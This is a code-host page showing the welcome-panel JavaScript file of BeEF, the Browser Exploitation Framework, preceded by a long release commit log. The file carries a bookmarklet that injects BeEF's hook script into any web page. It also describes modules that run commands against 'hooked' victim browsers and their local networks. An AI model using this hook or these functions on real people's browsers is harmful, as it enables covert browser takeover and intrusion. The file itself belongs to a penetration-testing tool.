Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
694df4c17b73c963d20923cab73bb615d32255f9
beef/extensions/admin_ui/media/javascript/ui/panel/WelcomeTab.js
wheatley b6425e4a90 Release 0.5.2.0 (#2166) 
* fixed offline zombie not deleting

* Bump jsdoc-to-markdown from 6.0.1 to 7.0.1 (#2161)

Bumps [jsdoc-to-markdown](https://github.com/jsdoc2md/jsdoc-to-markdown) from 6.0.1 to 7.0.1.
- [Release notes](https://github.com/jsdoc2md/jsdoc-to-markdown/releases)
- [Commits](https://github.com/jsdoc2md/jsdoc-to-markdown/compare/v6.0.1...v7.0.1)

---
updated-dependencies:
- dependency-name: jsdoc-to-markdown
  dependency-type: direct:development
  update-type: version-update:semver-major
...

Signed-off-by: dependabot[bot] <support@github.com>

Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>

* Bug: Core - 1785 Fixed public hook url configuration settings (#2163)

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* added spec file for testing changes

* added local host getter to configuration class

* added default value 0.0.0.0 for local host if it's not set

* added port config getter with default

* added port config getter with default

* fixed spelling errors for port

* added public configuration values and validation

* removed logic from public port as it was not required

* added beef host to configuration class

* added beef port to configuration class and removed default http.port logic from public_port

* fixed rubocop errors and refactored spec tests

* added beef host configuration values used for external resources

* added beef url to configuration

* created command spec file

* add before statement to load all enabled modules to test command class

* add spec to check if configuration instance exists by setting and accessing a config variable

* updated http proto for beef host

* reverting changes on this file, dev values set

* removed some unessessary checks

* fixed grammar test now we're only testing one configuration attribute

* added hook url for contextual usage

* refactoring admin_ui with new code usage

* fixed issue with the location of the beef.http.https.public_enabled

* refactored powershell module and extension

* adding the new config setting for public https beign enabled

* refactor qrcode extension

* replace video fake plugin refactor

* social engineering refactoring

* phonegap module refactoring

* exploit refactoing

* network module refactoing

* ipec module refactoring

* host module refactoring

* debug refactoring

* browser refactoring

* social engineering extension refactoring

* core main server refactoring

* core main console banner refactoring

* removing dev test

* fixed area with location of http.https.enabled

* changed the hook url definition to return the hook file path

* updated banners to use new configuration getters

* updated extensions and modules with the hook url change

* added new public.host configuration settings and validations for depicated usage of public

* updated to use public.port configuration

* added validation for old configuration public_port

* updated to use public https configuration setting

* updated config with new settings format

* fixed get to point to new locations

* fixed pointer to hook_file_path

* Update extensions/social_engineering/web_cloner/web_cloner.rb

Co-authored-by: bcoles <bcoles@gmail.com>

* updated enabled to enable

* making sure default configuration file does not have preset values

Co-authored-by: bcoles <bcoles@gmail.com>

* bumped versions to 0.5.2.0

* Usability: #2145. Added user input request for beef update within 'beef' install script (#2162)

* added user input request for beef update

* swaped git pull from system to backticks

* flags added for auto update and timout to input

* updated install.txt to reference the update-beef script (#2160)

Co-authored-by: Andrew Wheatley <a@andrews-mini.home>
Co-authored-by: Isaac Powell <36595182+DeezyE@users.noreply.github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
Co-authored-by: bcoles <bcoles@gmail.com>
2021-09-12 21:33:02 +10:00

75 lines
7.5 KiB
JavaScript
Raw Blame History

//
// Copyright (c) 2006-2021 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
WelcomeTab = function() {
<%
hook_url = BeEF::Core::Configuration.instance.hook_url
%>
var bookmarklet = "javascript:%20(function%20()%20{%20var%20url%20=%20%27<%= hook_url %>%27;if%20(typeof%20beef%20==%20%27undefined%27)%20{%20var%20bf%20=%20document.createElement(%27script%27);%20bf.type%20=%20%27text%2fjavascript%27;%20bf.src%20=%20url;%20document.body.appendChild(bf);}})();"
welcome = " \
<div style='font:11px tahoma,arial,helvetica,sans-serif;width:500px' > \
<p><img src='<%= @base_path %>/media/images/beef.jpg' alt='BeEF - The Browser Exploitation Framework' /></p><br /> \
<p>Official website: <a href='https://beefproject.com/'>http://beefproject.com/</a></p><br />\
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Getting Started</span></p><br />\
<p>Welcome to BeEF!</p><br /> \
<p>Before being able to fully explore the framework you will have to 'hook' a browser. To begin with you can point a browser towards the basic demo page <a href='/demos/basic.html' target='_blank'>here</a>, or the advanced version <a href='/demos/butcher/index.html' target='_blank'>here</a>.</p><br /> \
<p>If you want to hook ANY page (for debugging reasons of course), drag the following bookmarklet link into your browser's bookmark bar, then simply click the shortcut on another page: <a href='__BOOKMARKLETURL__'>Hook Me!</a></p><br /> \
<p>After a browser is hooked into the framework they will appear in the 'Hooked Browsers' panel on the left. Hooked browsers will appear in either an online or offline state, depending on how recently they have polled the framework.</p><br /> \
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Hooked Browsers</span></p><br />\
<p>To interact with a hooked browser simply left-click it, a new tab will appear. \
Each hooked browser tab has a number of sub-tabs, described below:</p><br /> \
<ul style=\"margin-left:15px;\"><li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Details:</span> Display information about the hooked browser after you've run some command modules.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Logs:</span> Displays recent log entries related to this particular hooked browser.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Commands:</span> This tab is where modules can be executed against the hooked browser. This is where most of the BeEF functionality resides. \
Most command modules consist of Javascript code that is executed against the selected\
Hooked Browser. Command modules are able to perform any actions that can be achieved\
through Javascript: for example they may gather information about the Hooked Browser, manipulate the DOM or perform other activities such as exploiting vulnerabilities within the local network of the Hooked Browser.<br /><br />\
Each command module has a traffic light icon, which is used to indicate the following:<ul>\
<li><img alt='' src='media/images/icons/green.png' unselectable='on'> The command module works against the target and should be invisible to the user</li>\
<li><img alt='' src='media/images/icons/orange.png' unselectable='on'> The command module works against the target, but may be visible to the user</li>\
<li><img alt='' src='media/images/icons/grey.png' unselectable='on'> The command module is yet to be verified against this target</li>\
<li><img alt='' src='media/images/icons/red.png' unselectable='on'> The command module does not work against this target</li></ul><br />\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> The XssRays tab allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Proxy:</span> The Proxy tab allows you to submit arbitrary HTTP requests on behalf of the hooked browser. \
Each request sent by the Proxy is recorded in the History panel. Click a history item to view the HTTP headers and HTML source of the HTTP response.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Network:</span> The Network tab allows you to interact with hosts on the local network(s) of the hooked browser.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>IPEC:</span> Send commands to the victims systems using Inter-Protocol Exploitation/Communication (IPEC)</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>WebRTC:</span> Send commands to the victims systems via a zombie specified as the primary WebRTC caller.</li> \
</ul><br /> \
<p>You can also right-click a hooked browser to open a context-menu with additional functionality:</p><br /> \
<ul style=\"margin-left:15px;\">\
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>Tunneling Proxy:</span> The Proxy allows you to use a hooked browser as a proxy. Simply right-click a browser from the Hooked Browsers tree to the left and select \"Use as Proxy\". \
The proxy runs on localhost port 6789 by default. Each request sent through the Proxy is recorded in the History panel in the Proxy tab. Click a history item to view the HTTP response headers and response body.</li> \
<li><span style='font:bold 11px tahoma,arial,helvetica,sans-serif'>XssRays:</span> XssRays allows the user to check if links, forms and URI path of the page (where the browser is hooked) is vulnerable to XSS. To customize default settings of an XssRays scan, please use the XssRays tab.</li></ul><br /> \
<p><span style='font:bold 13px tahoma,arial,helvetica,sans-serif'>Learn More</span></p><br />\
<p>To learn more about how BeEF works please review the wiki:</p><br />\
<ul style=\"margin-left:15px;\">\
<li>Architecture of the BeEF System: <a href='https://github.com/beefproject/beef/wiki/Architecture'>https://github.com/beefproject/beef/wiki/Architecture</a></li>\
<li>Tunneling Proxy: <a href='https://github.com/beefproject/beef/wiki/Tunneling-Proxy'>https://github.com/beefproject/beef/wiki/Tunneling-Proxy</a></li>\
<li>XssRays Integration: <a href='https://github.com/beefproject/beef/wiki/XssRays-Integration'>https://github.com/beefproject/beef/wiki/XssRays-Integration</a></li>\
<li>Network Discovery: <a href='https://github.com/beefproject/beef/wiki/Network-Discovery'>https://github.com/beefproject/beef/wiki/Network-Discovery</a></li>\
<li>Writing your own modules: <a href='https://github.com/beefproject/beef/wiki/Command-Module-API'>https://github.com/beefproject/beef/wiki/Command-Module-API</a></li>\
</ul>\
<br/>\
</div>\
";
welcome = welcome.replace(/__BOOKMARKLETURL__/,bookmarklet);
WelcomeTab.superclass.constructor.call(this, {
region:'center',
padding:'10 10 10 10',
html: welcome,
autoScroll: true,
border: false
});
};
Ext.extend(WelcomeTab,Ext.Panel, {});
Reference in New Issue View Git Blame Copy Permalink